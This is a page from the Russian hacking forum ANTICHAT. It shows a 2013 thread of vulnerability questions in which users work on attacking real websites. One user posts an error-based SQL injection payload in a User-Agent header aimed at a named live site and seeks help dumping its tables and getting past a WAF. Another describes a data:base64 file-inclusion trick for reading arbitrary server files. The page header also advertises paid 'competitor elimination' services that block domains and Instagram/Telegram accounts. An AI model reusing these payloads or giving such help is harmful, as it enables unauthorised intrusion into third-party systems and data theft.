УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 2292 из 2438

2292

Опции темы

Поиск в этой теме

Опции просмотра

#22911

25.10.2013, 23:23

Unknown

Guest

Сообщений: n/a

Провел на форуме:
16399

Репутация: 10

Цитата:

Сообщение от er9j6@

er9j6@ said:
нужен скрипт на php, в этих прогах скулю в User-Agent постом не получется передать

User-Agent - это не пост, это заголовок. Он передаётся и при GET и при POST запросах.

Цитата:

Сообщение от None

поделитесь скриптом на php, для передачи User-Agent в Post-запросе.

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]

[/COLOR][/COLOR]

ПС Но похоже тебе это не поможет

#22912

25.10.2013, 23:39

er9j6@

Guest

Сообщений: n/a

Провел на форуме:
107835

Репутация: 23

Цитата:

Сообщение от Ganz Euler

Ganz Euler said:
User-Agent - это не пост, это заголовок. Он передаётся и при GET и при POST запросах.

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]

[/COLOR][/COLOR]

(

как сюда уязвимый запрос правильно вставить?

#22913

26.10.2013, 00:07

Unknown

Guest

Сообщений: n/a

Провел на форуме:
16399

Репутация: 10

Цитата:

Сообщение от er9j6@

er9j6@ said:
как сюда уязвимый запрос правильно вставить?

Верно. Я пропустил одну строчку в оригинале =(

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]

Попробуй так

#22914

26.10.2013, 00:24

er9j6@

Guest

Сообщений: n/a

Провел на форуме:
107835

Репутация: 23

Цитата:

Сообщение от Ganz Euler

Ganz Euler said:
[/PHP]
Попробуй так

Скрипт работает правильно, но версию не выводит, хотя при GET запросе вывод есть Duplicate column name '5.1.68-log' , дальше продвинутся не удается , все фильтруется. Выводить таблицы нужно через POST-запрос

#22915

26.10.2013, 00:39

Unknown

Guest

Сообщений: n/a

Провел на форуме:
16399

Репутация: 10

Я видимо не совсем понимаю о чём речь. Этот скрипт как раз делает то что ты попросил, POST запрос с возможностью редактировать User-Agent.

Если тебе нужно отправить какие-то параметры POST'ом то

Цитата:

Сообщение от None

Если это всё не то, то приведи пример запроса.

#22916

26.10.2013, 00:43

er9j6@

Guest

Сообщений: n/a

Провел на форуме:
107835

Репутация: 23

Цитата:

Сообщение от Ganz Euler

Ganz Euler said:
Я видимо не совсем понимаю о чём речь. Этот скрипт как раз делает то что ты попросил, POST запрос с возможностью редактировать User-Agent.
Если тебе нужно отправить какие-то параметры POST'ом то
Если это всё не то, то приведи пример запроса.

Выкладываю

GET http://www.guppik.ru/components/com_true/sub_votepic.php?id=1&user_rating=1 HTTP/1.1

Host: www.guppik.ru

User-Agent: 'and(select*from(select(name_const(version(),1)),n ame_const(version(),1))a)and'

теперь нужно это переделать под POST-запрос, для вывода таблиц

#22917

26.10.2013, 01:15

Unknown

Guest

Сообщений: n/a

Провел на форуме:
16399

Репутация: 10

Цитата:

Сообщение от er9j6@

er9j6@ said:
Выкладываю
GET http://www.guppik.ru/components/com_true/sub_votepic.php?id=1&user_rating=1 HTTP/1.1
Host: www.guppik.ru
User-Agent: 'and(select*from(select(name_const(version(),1)),n ame_const(version(),1))a)and'
теперь нужно это переделать под POST-запрос, для вывода таблиц

Ок, теперь всё ясно. Ещё раз повторю что User-Agent это заголовок, POST/GET на него не влияют. В данном случае WAF/IPS/... режет запросы в которых есть совпадение '*informa*'. Я минут десять потыкался, но рабочего варианта послать information_schema в User-Agent не нашёл.

#22918

26.10.2013, 10:57

noviks

Guest

Сообщений: n/a

Провел на форуме:
4709

Репутация: 0

И снова вопрос по site/account?mode==data:;base64, с этим я разобрался,могу просматривать любые файлы и папки кроме файлов *.php ,как открыть php

#22919

26.10.2013, 11:53

Unknown

Guest

Сообщений: n/a

Провел на форуме:
16399

Репутация: 10

Цитата:

Сообщение от noviks

noviks said:
И снова вопрос по site/account?mode==data:;base64, с этим я разобрался,могу просматривать любые файлы и папки кроме файлов *.php ,как открыть php

site/account?mode==data:;base64,

PS Только сейчас понял, путь-то надо указывать не с веба, а локальный. По типу:

site/account?mode==data:;base64,

#22920

26.10.2013, 12:10

noviks

Guest

Сообщений: n/a

Провел на форуме:
4709

Репутация: 0

работает что так

что так

но файлы php не xочет показать

Страница 2292 из 2438

2292

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход